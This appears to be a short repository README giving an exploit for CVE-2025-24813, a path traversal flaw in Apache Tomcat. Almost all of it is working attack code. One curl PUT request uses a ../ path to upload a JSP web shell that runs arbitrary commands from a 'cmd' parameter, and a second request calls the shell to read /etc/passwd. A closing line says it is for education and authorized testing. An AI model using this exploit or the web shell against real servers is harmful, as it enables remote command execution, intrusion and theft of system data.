Apache Tomcat is vulnerable to a Path Equivalence / Path Traversal issue due to improper handling of ../ sequences in paths.
CVE ID: CVE-2025-24813
- Severity: Critical
Reference link: https://github.com/advisories/GHSA-83qj-6fr2-vhqg
1. Send a curl request with a PUT method:
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
2. Access the uploaded file directly:
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
This repository is created for educational purposes and authorized testing only.
Unauthorized use against systems without explicit permission is illegal.